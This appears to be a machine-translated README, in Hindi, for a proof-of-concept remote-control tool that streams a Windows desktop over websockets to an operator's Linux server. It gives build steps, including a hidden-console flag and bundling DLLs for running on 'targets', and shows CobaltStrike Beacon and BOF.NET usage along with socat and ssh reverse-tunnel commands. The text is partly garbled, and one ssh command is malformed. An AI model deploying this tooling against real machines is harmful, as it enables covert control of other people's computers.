
it is very good

वेबसॉकेट्स पर Windows मशीनों को दूरस्थ रूप से नियंत्रित करने के लिए एक PoC। विस्तृत विवरण के लिए मेरा ब्लॉग देखें।


reinschauer कच्चे बिटमैप्स को JPEG में परिवर्तित करता है और फ्रेम आकार कम करने के लिए डेटा को नेटवर्क पर भेजने से पहले संपीड़ित करता है।
server फ़ोल्डर में स्क्रिप्ट का उपयोग कर सकते हैं या अपनी खुद की फ़ाइलें ला सकते हैं।reinschauer-server -h का उपयोग करें।+----------------------------------------------------------------------------------------+
| |
| |
| +----------------------------------------------------+ |
| |#1: Type (Binary or Text) | |
| | Binary: JPG Frame | |
| | | |
| |#2: Text | |
| | ELO (Ping) | |
| | FPS <FPS Count> | |
| | SCL <Scaler Count> | |
| | QUL <JPG Quality> | |
| | LCL X Y (Left Click + Coordinates) | |
| | RCL X Y | |
| | KEY <Char> | xxxxxx |
| xxxxx <--+----------------------------------------------------+--> xxxx xx |
| x xx Websockets via TLS xx x |
| x xxxxxx xxxxxxxxx |
| xxx x xx xx x |
| xxxxxxxx xxxxx xxxxxx |
| x xxxxx |
| xx xx |
| x xx xxx |
| xx xx x xx |
| x xx xx xxx |
| x xx x xx |
| x x xx x |
+----------------------------------------------------------------------------------------+
निर्माण कैसे करें?
>=1.18sudo apt -y install libx11-dev libxcursor-dev xorg-dev libgl1-mesa-dev$ cd client && GOOS=windows GOARCH=amd64 go build
$ cd server && GOOS=linux GOARCH=amd64 go build
मैंने इस रिपो में dotnet वेरिएंट का एक पहले से निर्मित और स्टैंडअलोन संस्करण शामिल किया है। यदि आप इसे स्वयं बनाना चाहते हैं, तो x64 Release वेरिएंट बनाने के लिए Visual Studio प्रोजेक्ट फ़ाइल का उपयोग करें। यदि यह स्वचालित रूप से नहीं होता है, तो Visual Studio के माध्यम से प्रोजेक्ट के लिए आवश्यक NuGet पैकेज डाउनलोड करें। आपके लक्ष्य सिस्टम में संभवतः ये पैकेज भी इंस्टॉल नहीं हैं, इसलिए लक्ष्य पर परिणामी exe निष्पादित करते समय DLLs गायब हो सकती हैं। इससे बचने के लिए, यह प्रोजेक्ट आवश्यक लाइब्रेरीज़ के साथ परिणामी exe को बंडल करने के लिए स्वचालित रूप से ILMerge.exe को आमंत्रित करता है। इसलिए, लक्ष्यों पर reinschauer-dotnet-standalone.exe नामक उत्पन्न फ़ाइल का उपयोग करें।
आपको पहले
go getचलाना पड़ सकता है। कंसोल विंडो को अक्षम करने के लिए-ldflags -H=windowsguiका उपयोग करें।
क्लाइंट/सर्वर कौन है?
clientलक्ष्य (Windows) मशीन पर निष्पादित किया जाता है।serverघटक परीक्षक की (Linux) मशीन पर निष्पादित किया जाता है। यह डिफ़ॉल्ट रूप से0.0.0.0:6969पर सुनता है। Golang और C# दोनों क्लाइंट सर्वर के साथ संगत हैं।
क्या यह HVNC / Hidden Desktop है?
नहीं। यह उपयोगकर्ता के समान डेस्कटॉप का उपयोग करता है।
कुछ कुंजियाँ और कुंजी संयोजन काम नहीं करते, कृपया ठीक करें
मुझे पता है कि |, @ और § वर्तमान में काम नहीं कर सकते हैं, कम से कम मेरे जर्मन पोटैटो कीबोर्ड पर। कृपया ठीक करें।
क्लाइंट बहुत अधिक CPU समय उपयोग करता है
कम FPS मान उपयोग करने से काम चल सकता है।
मेरे पास client और server के बीच सीधा कनेक्शन नहीं है
आप ट्रैफ़िक टनल करने के लिए CobaltStrike Beacon का उपयोग कर सकते हैं।
मेरे पास Cobaltstrike नहीं है!
इस तरह एक
socatरीडायरेक्टर का उपयोग करें:
socat TCP4-LISTEN:1337,fork TCP4:127.0.0.1:6969
ssh -R 6969:localhost6969 <IP>
और क्लाइंट को आवश्यक पैरामीटर के साथ शुरू करें या उन्हें हार्डकोड करें।
पहले, मैनुअल के अनुसार BOF.NET सेट अप करें। साथ ही, bofnet_load <Path to Exe> के साथ स्टैंडअलोन exe लोड करें। फिर, तय करें कि Reinschauer का उपयोग कैसे करना है:
sleep 0।rportfwd_local 6969 127.0.0.1 6969।bofnet_job reinschauer_dotnet.BofStuff। यह स्वचालित रूप से Reinschauer को लक्ष्य मशीन के 127.0.0.1 पर 127.0.0.1:6969 से कनेक्ट कराता है। यह TLS को भी निष्क्रिय कर देता है, क्योंकि यह वैसे भी Beacon कनेक्शन का उपयोग करता है।bofnet_jobkill <Job ID> का उपयोग करें।bofnet_job reinschauer_dotnet.BofStuff <Server IP> <Server Port> true। बूलियन पैरामीटर TLS उपयोग सक्षम करता है।bofnet_jobkill <Job ID> का उपयोग करें।फिर, SSH और GatewayPorts सुविधा का उपयोग करें: sshd_config में GatewayPorts: clientspecified जोड़ें और SSH सर्वर को पुनरारंभ करें। फिर, ssh -R '0.0.0.0:8080:localhost:6969'' [...] आपके स्थानीय पोर्ट 6969 को 0.0.0.0:8080 पर उपलब्ध कराएगा। सावधान रहें :)
या, सर्वर पर एक socat रीडायरेक्टर सेट करें:
socat TCP4-LISTEN:<Server Port>,fork TCP4:127.0.0.1:6969
ssh -R 6969:localhost6969 <IP>